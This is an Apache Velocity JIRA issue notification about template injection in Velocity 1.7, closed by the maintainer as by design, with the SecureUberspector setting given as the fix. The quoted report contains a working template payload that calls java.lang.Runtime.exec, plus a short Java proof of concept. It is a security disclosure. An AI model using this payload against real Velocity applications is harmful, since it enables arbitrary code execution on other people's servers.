[ https://issues.apache.org/jira/browse/VELOCITY-877?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Sergiu Dumitriu closed VELOCITY-877. ------------------------------------ Resolution: Not A Problem Assignee: Sergiu Dumitriu Yes, this is by design, **if** you are using the default uberspector. Velocity also comes with a secure uberspector, which is designed to prevent exactly this kind of security issues. {noformat} runtime.introspector.uberspect = org.apache.velocity.util.introspection.SecureUberspector {noformat} > Access to critical fields/methods allows execution of arbitrary code > ('Template Injection') > ------------------------------------------------------------------------------------------- > > Key: VELOCITY-877 > URL: https://issues.apache.org/jira/browse/VELOCITY-877 > Project: Velocity > Issue Type: Bug > Components: Engine > Affects Versions: 1.7 > Reporter: Markus Wulftange > Assignee: Sergiu Dumitriu > Priority: Critical > Labels: security > > It is possible to reference certain fields/methods, which eventually allow > the execution of arbitrary methods. > For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of > any variable, it is possible to get the variable's class object. This can be > extended to get arbitrary class objects and execute arbitrary methods. > For example, the following statement results in the execution of the > '{{xterm}}': > {code} > $var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor() > {code} > As a standalone: > {code:java} > import org.apache.velocity.VelocityContext; > import org.apache.velocity.app.Velocity; > import org.apache.velocity.context.Context; > public class VelocityTest { > public static void main(String[] args) { > Context context = new VelocityContext(); > context.put("var", "foo"); > String instring = > "$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()"; > Velocity.evaluate(context, null, "templateName", instring); > } > } > {code} > This issue has already been made public in the past by James Kettle in August > 2015 (see > http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity) > and via CVE-2015-5603 (see > https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly > others. -- This message was sent by Atlassian JIRA (v6.3.4#6332) --------------------------------------------------------------------- To unsubscribe, e-mail: dev-unsubscr...@velocity.apache.org For additional commands, e-mail: dev-h...@velocity.apache.org